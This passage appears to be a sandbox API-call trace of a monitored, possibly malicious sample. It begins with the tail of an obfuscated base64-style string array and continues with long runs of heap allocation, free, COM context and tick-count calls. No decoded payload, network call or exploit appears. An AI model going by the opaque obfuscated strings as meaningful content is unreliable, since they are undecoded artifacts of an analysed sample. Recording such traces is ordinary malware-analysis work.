cOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0104.798] GetProcessHeap () returned 0x240000
	[0104.798] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x278430, Size=0x11238) returned 0x2aae20
	[0104.799] ??2@YAPEAX_K@Z () returned 0x42f480
	[0104.799] GetCurrentThreadId () returned 0xb9c
	[0104.799] realloc (_Block=0x0, _Size=0xc8) returned 0x42f4e0
	[0104.799] ??2@YAPEAX_K@Z () returned 0x42f5b0
	[0104.799] malloc (_Size=0x1008) returned 0x42a210
	[0104.799] ??2@YAPEAX_K@Z () returned 0x42f5f0
	[0104.800] malloc (_Size=0x108) returned 0x428060
	[0104.801] malloc (_Size=0x208) returned 0x42f7a0
	[0104.801] malloc (_Size=0x200) returned 0x42f9b0
	[0104.801] malloc (_Size=0x408) returned 0x42fbc0
	[0104.801] malloc (_Size=0x2008) returned 0x42b220
	[0104.801] malloc (_Size=0x808) returned 0x42d230
	[0104.802] malloc (_Size=0x1008) returned 0x42da40
	[0104.803] malloc (_Size=0x4008) returned 0x43dfd0
	[0104.803] malloc (_Size=0x2008) returned 0x441fe0
	[0104.805] malloc (_Size=0x4008) returned 0x443ff0
	[0105.268] ??2@YAPEAX_K@Z () returned 0x441a60
	[0105.270] ??2@YAPEAX_K@Z () returned 0x441b10
	[0105.270] ??2@YAPEAX_K@Z () returned 0x442550
	[0105.270] malloc (_Size=0x80) returned 0x441bc0
	[0105.270] malloc (_Size=0x108) returned 0x428b00
	[0105.271] ??2@YAPEAX_K@Z () returned 0x444520
	[0105.271] ??2@YAPEAX_K@Z () returned 0x444550
	[0105.272] ??2@YAPEAX_K@Z () returned 0x444580
	[0105.273] ??2@YAPEAX_K@Z () returned 0x4445b0
	[0105.273] ??2@YAPEAX_K@Z () returned 0x4445e0
	[0105.273] ??2@YAPEAX_K@Z () returned 0x444610
	[0105.274] ??2@YAPEAX_K@Z () returned 0x444f90
	[0105.274] ??2@YAPEAX_K@Z () returned 0x444fc0
	[0105.274] ??2@YAPEAX_K@Z () returned 0x444ff0
	[0105.275] ??2@YAPEAX_K@Z () returned 0x445020
	[0105.275] ??2@YAPEAX_K@Z () returned 0x445050
	[0105.276] ??2@YAPEAX_K@Z () returned 0x445080
	[0105.276] ??2@YAPEAX_K@Z () returned 0x4450b0
	[0105.278] ??2@YAPEAX_K@Z () returned 0x4450e0
	[0105.279] ??2@YAPEAX_K@Z () returned 0x445110
	[0105.282] ??2@YAPEAX_K@Z () returned 0x445140
	[0105.283] ??2@YAPEAX_K@Z () returned 0x445170
	[0105.285] ??2@YAPEAX_K@Z () returned 0x4451d0
	[0105.287] ??2@YAPEAX_K@Z () returned 0x445200
	[0105.289] ??2@YAPEAX_K@Z () returned 0x445230
	[0105.291] ??2@YAPEAX_K@Z () returned 0x445260
	[0105.293] ??2@YAPEAX_K@Z () returned 0x445290
	[0105.295] ??2@YAPEAX_K@Z () returned 0x4452c0
	[0105.296] ??2@YAPEAX_K@Z () returned 0x4452f0
	[0105.299] ??2@YAPEAX_K@Z () returned 0x445320
	[0105.300] ??2@YAPEAX_K@Z () returned 0x445350
	[0105.302] ??2@YAPEAX_K@Z () returned 0x445380
	[0105.508] ??2@YAPEAX_K@Z () returned 0x4453b0
	[0105.509] ??2@YAPEAX_K@Z () returned 0x4453e0
	[0105.511] ??2@YAPEAX_K@Z () returned 0x445410
	[0105.514] ??2@YAPEAX_K@Z () returned 0x445440
	[0105.515] ??2@YAPEAX_K@Z () returned 0x445470
	[0105.517] ??2@YAPEAX_K@Z () returned 0x4454a0
	[0105.519] ??2@YAPEAX_K@Z () returned 0x4454d0
	[0105.521] ??2@YAPEAX_K@Z () returned 0x445500
	[0105.523] ??2@YAPEAX_K@Z () returned 0x445530
	[0105.525] ??2@YAPEAX_K@Z () returned 0x445560
	[0105.527] ??2@YAPEAX_K@Z () returned 0x445590
	[0105.529] ??2@YAPEAX_K@Z () returned 0x4455c0
	[0105.531] ??2@YAPEAX_K@Z () returned 0x4455f0
	[0105.533] ??2@YAPEAX_K@Z () returned 0x445620
	[0105.534] ??2@YAPEAX_K@Z () returned 0x445650
	[0105.537] ??2@YAPEAX_K@Z () returned 0x445680
	[0105.539] ??2@YAPEAX_K@Z () returned 0x4456b0
	[0105.540] ??2@YAPEAX_K@Z () returned 0x4456e0
	[0105.543] ??2@YAPEAX_K@Z () returned 0x445710
	[0105.545] ??2@YAPEAX_K@Z () returned 0x445740
	[0105.546] ??2@YAPEAX_K@Z () returned 0x445770
	[0105.549] ??2@YAPEAX_K@Z () returned 0x4457a0
	[0105.550] ??2@YAPEAX_K@Z () returned 0x4457d0
	[0105.552] ??2@YAPEAX_K@Z () returned 0x445800
	[0105.680] ??2@YAPEAX_K@Z () returned 0x445830
	[0105.681] ??2@YAPEAX_K@Z () returned 0x445860
	[0105.683] ??2@YAPEAX_K@Z () returned 0x445890
	[0105.686] ??2@YAPEAX_K@Z () returned 0x4458c0
	[0105.687] ??2@YAPEAX_K@Z () returned 0x4458f0
	[0105.689] ??2@YAPEAX_K@Z () returned 0x445920
	[0105.691] ??2@YAPEAX_K@Z () returned 0x445950
	[0105.693] ??2@YAPEAX_K@Z () returned 0x446910
	[0105.695] ??2@YAPEAX_K@Z () returned 0x446940
	[0105.697] ??2@YAPEAX_K@Z () returned 0x446970
	[0105.699] ??2@YAPEAX_K@Z () returned 0x4469a0
	[0105.701] ??2@YAPEAX_K@Z () returned 0x4469d0
	[0105.703] ??2@YAPEAX_K@Z () returned 0x446a00
	[0105.705] ??2@YAPEAX_K@Z () returned 0x446a30
	[0105.706] ??2@YAPEAX_K@Z () returned 0x446a60
	[0105.709] ??2@YAPEAX_K@Z () returned 0x446a90
	[0105.711] ??2@YAPEAX_K@Z () returned 0x446ac0
	[0105.712] ??2@YAPEAX_K@Z () returned 0x446af0
	[0105.713] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x157818 | out: ppv=0x157818*=0x25f420) returned 0x0
	[0105.715] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.715] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.715] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.715] free (_Block=0x441c70) 
	[0105.715] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.715] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] free (_Block=0x42ed60) 
	[0105.716] free (_Block=0x440930) 
	[0105.716] free (_Block=0x4286c0) 
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] free (_Block=0x441e20) 
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] free (_Block=0x42ffb0) 
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] free (_Block=0x481140) 
	[0105.716] free (_Block=0x428060) 
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] ??3@YAXPEAX@Z () returned 0x57760f01
	[0105.716] MulDiv (nNumber=111, nNumerator=100, nDenominator=512) returned 22
	[0105.716] IUnknown:Release (This=0x25f420) returned 0x1
	[0105.716] GetTickCount () returned 0x2ae77
	[0105.718] ??2@YAPEAX_K@Z () returned 0x446b20
	[0105.720] ??2@YAPEAX_K@Z () returned 0x446b50
	[0105.721] ??2@YAPEAX_K@Z () returned 0x446b80
	[0105.724] ??2@YAPEAX_K@Z () returned 0x446bb0
	[0105.819] ??2@YAPEAX_K@Z () returned 0x446be0
	[0105.821] ??2@YAPEAX_K@Z () returned 0x446c10
	[0105.823] ??2@YAPEAX_K@Z () returned 0x446c40
	[0105.825] ??2@YAPEAX_K@Z () returned 0x446c70
	[0105.826] ??2@YAPEAX_K@Z () returned 0x446ca0
	[0105.829] ??2@YAPEAX_K@Z () returned 0x446cd0
	[0105.830] ??2@YAPEAX_K@Z () returned 0x446d00
	[0105.832] ??2@YAPEAX_K@Z () returned 0x446d30
	[0105.835] ??2@YAPEAX_K@Z () returned 0x446d60
	[0105.836] ??2@YAPEAX_K@Z () returned 0x446d90
	[0105.838] ??2@YAPEAX_K@Z () returned 0x446dc0
	[0105.841] ??2@YAPEAX_K@Z () returned 0x446df0
	[0105.842] ??2@YAPEAX_K@Z () returned 0x446e20
	[0105.844] ??2@YAPEAX_K@Z () returned 0x446e50
	[0105.846] ??2@YAPEAX_K@Z () returned 0x446e80
	[0105.848] ??2@YAPEAX_K@Z () returned 0x446eb0
	[0105.850] ??2@YAPEAX_K@Z () returned 0x446ee0
	[0105.852] ??2@YAPEAX_K@Z () returned 0x446f10
	[0105.854] ??2@YAPEAX_K@Z () returned 0x446f40
	[0105.855] ??2@YAPEAX_K@Z () returned 0x446f70
	[0105.858] ??2@YAPEAX_K@Z () returned 0x446fa0
	[0105.860] ??2@YAPEAX_K@Z () returned 0x446fd0
	[0105.861] ??2@YAPEAX_K@Z () returned 0x447000
	[0105.864] ??2@YAPEAX_K@Z () returned 0x447030
	[0105.975] ??2@YAPEAX_K@Z () returned 0x447060
	[0105.977] ??2@YAPEAX_K@Z () returned 0x447090
	[0105.979] ??2@YAPEAX_K@Z () returned 0x447a90
	[0105.981] ??2@YAPEAX_K@Z () returned 0x447ac0
	[0105.982] ??2@YAPEAX_K@Z () returned 0x447af0
	[0105.985] ??2@YAPEAX_K@Z () returned 0x447b20
	[0105.987] ??2@YAPEAX_K@Z () returned 0x447b50
	[0105.988] ??2@YAPEAX_K@Z () returned 0x447b80
	[0105.991] ??2@YAPEAX_K@Z () returned 0x447bb0
	[0105.994] MulDiv (nNumber=491, nNumerator=100, nDenominator=917) returned 54
	[0105.994] IUnknown:Release (This=0x25f420) returned 0x1
	[0105.995] GetTickCount () returned 0x2af8f
	[0105.996] MulDiv (nNumber=256, nNumerator=100, nDenominator=938) returned 27
	[0105.996] IUnknown:Release (This=0x25f420) returned 0x1
	[0105.996] GetTickCount () returned 0x2af8f
	[0105.996] realloc (_Block=0x0, _Size=0xc8) returned 0x444520
	[0106.846] ??2@YAPEAX_K@Z () returned 0x441c50
	[0106.846] malloc (_Size=0x20) returned 0x44c1b0
	[0106.846] malloc (_Size=0x288) returned 0x44c860
	[0106.846] realloc (_Block=0x0, _Size=0x140) returned 0x441f40
	[0108.026] ??2@YAPEAX_K@Z () returned 0x44c1b0
	[0108.027] ??2@YAPEAX_K@Z () returned 0x44c1e0
	[0108.028] ??2@YAPEAX_K@Z () returned 0x44c210
	[0108.028] ??2@YAPEAX_K@Z () returned 0x44c240
	[0108.029] ??2@YAPEAX_K@Z () returned 0x44c270
	[0108.030] ??2@YAPEAX_K@Z () returned 0x44c2a0
	[0108.031] ??2@YAPEAX_K@Z () returned 0x44c2d0
	[0108.031] ??2@YAPEAX_K@Z () returned 0x44c300
	[0108.032] ??2@YAPEAX_K@Z () returned 0x44c330
	[0108.033] ??2@YAPEAX_K@Z () returned 0x44c360
	[0108.164] ??2@YAPEAX_K@Z () returned 0x44c390
	[0108.165] ??2@YAPEAX_K@Z () returned 0x44c3c0
	[0108.166] ??2@YAPEAX_K@Z () returned 0x44c3f0
	[0108.166] ??2@YAPEAX_K@Z () returned 0x44c420
	[0108.167] ??2@YAPEAX_K@Z () returned 0x44c450
	[0108.168] ??2@YAPEAX_K@Z () returned 0x44c480
	[0108.168] ??2@YAPEAX_K@Z () returned 0x44c4b0
	[0108.169] ??2@YAPEAX_K@Z () returned 0x44c4e0
	[0108.170] ??2@YAPEAX_K@Z () returned 0x44c510
	[0108.171] ??2@YAPEAX_K@Z () returned 0x44c540
	[0108.171] ??2@YAPEAX_K@Z () returned 0x44c570
	[0108.172] ??2@YAPEAX_K@Z () returned 0x44c5a0
	[0108.173] ??2@YAPEAX_K@Z () returned 0x44c5d0
	[0108.173] ??2@YAPEAX_K@Z () returned 0x44c600
	[0108.174] ??2@YAPEAX_K@Z () returned 0x44c630
	[0108.175] ??2@YAPEAX_K@Z () returned 0x44c660
	[0108.176] ??2@YAPEAX_K@Z () returned 0x44c690
	[0108.176] ??2@YAPEAX_K@Z () returned 0x44c6c0
	[0108.177] ??2@YAPEAX_K@Z () returned 0x44c6f0
	[0108.178] ??2@YAPEAX_K@Z () returned 0x44c720
	[0108.178] ??2@YAPEAX_K@Z () returned 0x44c750
	[0108.179] ??2@YAPEAX_K@Z () returned 0x44c780
	[0108.180] ??2@YAPEAX_K@Z () returned 0x44c7b0
	[0108.181] ??2@YAPEAX_K@Z () returned 0x44c7e0
	[0108.181] ??2@YAPEAX_K@Z () returned 0x44c810
	[0108.182] ??2@YAPEAX_K@Z () returned 0x44e1e0
	[0108.183] ??2@YAPEAX_K@Z () returned 0x44e210
	[0108.184] ??2@YAPEAX_K@Z () returned 0x44e240
	[0108.184] ??2@YAPEAX_K@Z () returned 0x44e270
	[0108.185] ??2@YAPEAX_K@Z () returned 0x44e2a0
	[0108.186] ??2@YAPEAX_K@Z () returned 0x44e2d0
	[0108.186] ??2@YAPEAX_K@Z () returned 0x44e300
	[0108.187] ??2@YAPEAX_K@Z () returned 0x44e330
	[0108.188] ??2@YAPEAX_K@Z () returned 0x44e360
	[0108.189] ??2@YAPEAX_K@Z () returned 0x44e390
	[0108.189] ??2@YAPEAX_K@Z () returned 0x44e3c0
	[0108.190] ??2@YAPEAX_K@Z () returned 0x44e3f0
	[0108.191] ??2@YAPEAX_K@Z () returned 0x44e420
	[0108.191] ??2@YAPEAX_K@Z () returned 0x44e450
	[0108.192] ??2@YAPEAX_K@Z () returned 0x44e480
	[0108.193] ??2@YAPEAX_K@Z () returned 0x44e4b0
	[0108.194] ??2@YAPEAX_K@Z () returned 0x44e4e0
	[0108.194] ??2@YAPEAX_K@Z () returned 0x44e510
	[0108.195] ??2@YAPEAX_K@Z () returned 0x44e540
	[0108.273] ??2@YAPEAX_K@Z () returned 0x44e570
	[0108.273] ??2@YAPEAX_K@Z () returned 0x44e5a0
	[0108.274] ??2@YAPEAX_K@Z () returned 0x44e5d0
	[0108.275] ??2@YAPEAX_K@Z () returned 0x44e600
	[0108.275] ??2@YAPEAX_K@Z () returned 0x44e630
	[0108.276] ??2@YAPEAX_K@Z () returned 0x44e660
	[0108.277] ??2@YAPEAX_K@Z () returned 0x44e690
	[0108.277] ??2@YAPEAX_K@Z () returned 0x44e6c0
	[0108.278] ??2@YAPEAX_K@Z () returned 0x44e6f0
	[0108.279] ??2@YAPEAX_K@Z () returned 0x44e720
	[0108.280] ??2@YAPEAX_K@Z () returned 0x44e750
	[0108.280] ??2@YAPEAX_K@Z () returned 0x44e780
	[0108.281] ??2@YAPEAX_K@Z () returned 0x453bf0
	[0108.282] ??2@YAPEAX_K@Z () returned 0x44e7b0
	[0108.282] ??2@YAPEAX_K@Z () returned 0x44e7e0
	[0108.283] ??2@YAPEAX_K@Z () returned 0x44e810
	[0108.284] ??2@YAPEAX_K@Z () returned 0x44e840
	[0108.285] ??2@YAPEAX_K@Z () returned 0x44e870
	[0108.285] ??2@YAPEAX_K@Z () returned 0x44e8a0
	[0108.286] ??2@YAPEAX_K@Z () returned 0x44e8d0
	[0108.287] ??2@YAPEAX_K@Z () returned 0x44e900
	[0108.288] ??2@YAPEAX_K@Z () returned 0x44e930
	[0108.288] ??2@YAPEAX_K@Z () returned 0x44e960
	[0108.289] ??2@YAPEAX_K@Z () returned 0x4545a0
	[0108.290] ??2@YAPEAX_K@Z () returned 0x4545d0
	[0108.290] ??2@YAPEAX_K@Z () returned 0x454600
	[0108.291] ??2@YAPEAX_K@Z () returned 0x454630
	[0108.292] ??2@YAPEAX_K@Z () returned 0x454660
	[0108.292] ??2@YAPEAX_K@Z () returned 0x454690
	[0108.293] ??2@YAPEAX_K@Z () returned 0x4546c0
	[0108.294] ??2@YAPEAX_K@Z () returned 0x4546f0
	[0108.295] ??2@YAPEAX_K@Z () returned 0x442a20
	[0108.295] malloc (_Size=0x80) returned 0x440b20
	[0108.295] malloc (_Size=0x108) returned 0x428c10
	[0108.298] ??2@YAPEAX_K@Z () returned 0x480a20
	[0108.300] ??2@YAPEAX_K@Z () returned 0x441420
	[0108.301] realloc (_Block=0x0, _Size=0x64) returned 0x444520
	[0108.301] realloc (_Block=0x0, _Size=0x27c) returned 0x44caf0
	[0108.303] free (_Block=0x444520) 
	[0108.304] ??2@YAPEAX_K@Z () returned 0x454720
	[0108.305] ??2@YAPEAX_K@Z () returned 0x454750
	[0108.305] ??2@YAPEAX_K@Z () returned 0x454780
	[0108.306] ??2@YAPEAX_K@Z () returned 0x4547b0
	[0108.307] ??2@YAPEAX_K@Z () returned 0x4547e0
	[0108.307] ??2@YAPEAX_K@Z () returned 0x454810
	[0108.308] ??2@YAPEAX_K@Z () returned 0x454840
	[0108.309] ??2@YAPEAX_K@Z () returned 0x454870
	[0108.309] ??2@YAPEAX_K@Z () returned 0x4548a0
	[0108.310] ??2@YAPEAX_K@Z () returned 0x4548d0
	[0108.311] ??2@YAPEAX_K@Z () returned 0x454900
	[0108.312] ??2@YAPEAX_K@Z () returned 0x454930
	[0108.312] ??2@YAPEAX_K@Z () returned 0x454960
	[0108.313] ??2@YAPEAX_K@Z () returned 0x454990
	[0108.314] ??2@YAPEAX_K@Z () returned 0x4549c0
	[0108.315] ??2@YAPEAX_K@Z () returned 0x454d70
	[0108.316] ??2@YAPEAX_K@Z () returned 0x4549f0
	[0108.316] ??2@YAPEAX_K@Z () returned 0x454a20
	[0108.317] ??2@YAPEAX_K@Z () returned 0x454a50
	[0108.318] ??2@YAPEAX_K@Z () returned 0x454a80
	[0108.319] ??2@YAPEAX_K@Z () returned 0x454ab0
	[0108.709] ??2@YAPEAX_K@Z () returned 0x454ae0
	[0108.710] ??2@YAPEAX_K@Z () returned 0x454b10
	[0108.711] ??2@YAPEAX_K@Z () returned 0x454b40
	[0108.711] ??2@YAPEAX_K@Z () returned 0x454b70
	[0108.712] ??2@YAPEAX_K@Z () returned 0x454ba0
	[0108.713] ??2@YAPEAX_K@Z () returned 0x454bd0
	[0108.714] ??2@YAPEAX_K@Z () returned 0x454c00
	[0108.714] ??2@YAPEAX_K@Z () returned 0x454c30
	[0108.715] ??2@YAPEAX_K@Z () returned 0x454c60
	[0108.716] ??2@YAPEAX_K@Z () returned 0x454c90
	[0108.716] ??2@YAPEAX_K@Z () returned 0x454cc0
	[0108.717] ??2@YAPEAX_K@Z () returned 0x454cf0
	[0108.718] ??2@YAPEAX_K@Z () returned 0x454d20
	[0108.719] ??2@YAPEAX_K@Z () returned 0x455720
	[0108.719] ??2@YAPEAX_K@Z () returned 0x455750
	[0108.720] ??2@YAPEAX_K@Z () returned 0x455780
	[0108.721] ??2@YAPEAX_K@Z () returned 0x4557b0
	[0108.721] ??2@YAPEAX_K@Z () returned 0x4557e0
	[0108.722] ??2@YAPEAX_K@Z () returned 0x455810
	[0108.723] ??2@YAPEAX_K@Z () returned 0x455840
	[0108.724] ??2@YAPEAX_K@Z () returned 0x455870
	[0108.724] ??2@YAPEAX_K@Z () returned 0x4558a0
	[0108.725] ??2@YAPEAX_K@Z () returned 0x4558d0
	[0108.726] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x157818 | out: ppv=0x157818*=0x25f420) returned 0x0
	[0108.727] ??3@YAXPEAX@Z () returned 0x57760f01
	[0108.727] ??3@YAXPEAX@Z () returned 0x1
	[0108.727] ??3@YAXPEAX@Z () returned 0x1900050001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1
	[0108.727] ??3@YAXPEAX@Z () returned 0x16007a0001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1700770001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1800740001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1900710001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1a006e0001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1b006b0001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1c00680001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1d00650001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1e00620001
	[0108.727] ??3@YAXPEAX@Z () returned 0x1f005f0001
	[0108.727] ??3@YAXPEAX@Z () returned 0x20005c0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2100590001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2200560001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2300530001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2400500001
	[0108.728] ??3@YAXPEAX@Z () returned 0x25004d0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x26004a0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2700470001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2800440001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2900410001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2a003e0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2b003b0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2c00380001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2d00350001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2e00320001
	[0108.728] ??3@YAXPEAX@Z () returned 0x2f002f0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x30002c0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x3100290001
	[0108.728] ??3@YAXPEAX@Z () returned 0x3200260001
	[0108.728] ??3@YAXPEAX@Z () returned 0x3300230001
	[0108.728] ??3@YAXPEAX@Z () returned 0x3400200001
	[0108.728] ??3@YAXPEAX@Z () returned 0x35001d0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x36001a0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x3700170001
	[0108.728] ??3@YAXPEAX@Z () returned 0x3800140001
	[0108.728] ??3@YAXPEAX@Z () returned 0x1
	[0108.728] ??3@YAXPEAX@Z () returned 0x3900110001
	[0108.728] ??3@YAXPEAX@Z () returned 0x3a000e0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x3b000b0001
	[0108.728] ??3@YAXPEAX@Z () returned 0x3c00080001
	[0108.728] ??3@YAXPEAX@Z () returned 0x700110001
	[0108.729] ??3@YAXPEAX@Z () returned 0x8000e0001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1
	[0108.729] ??3@YAXPEAX@Z () returned 0x1
	[0108.729] ??3@YAXPEAX@Z () returned 0x19007a0001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1a00770001
	[0108.729] ??3@YAXPEAX@Z () returned 0x9000b0001
	[0108.729] ??3@YAXPEAX@Z () returned 0xa00080001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1b00740001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1c00710001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1d006e0001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1e006b0001
	[0108.729] ??3@YAXPEAX@Z () returned 0xb00050001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1a00020001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1f00680001
	[0108.729] ??3@YAXPEAX@Z () returned 0x2000650001
	[0108.729] ??3@YAXPEAX@Z () returned 0x2100620001
	[0108.729] ??3@YAXPEAX@Z () returned 0x22005f0001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1b007a0001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1c00770001
	[0108.729] ??3@YAXPEAX@Z () returned 0x23005c0001
	[0108.729] ??3@YAXPEAX@Z () returned 0x2400590001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1
	[0108.729] ??3@YAXPEAX@Z () returned 0x1800470001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1900440001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1a00410001
	[0108.729] ??3@YAXPEAX@Z () returned 0x2500560001
	[0108.729] ??3@YAXPEAX@Z () returned 0x2600530001
	[0108.729] ??3@YAXPEAX@Z () returned 0x1d00740001
	[0108.730] ??3@YAXPEAX@Z () returned 0x1b003e0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x1c003b0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x1e00710001
	[0108.730] ??3@YAXPEAX@Z () returned 0x1d00380001
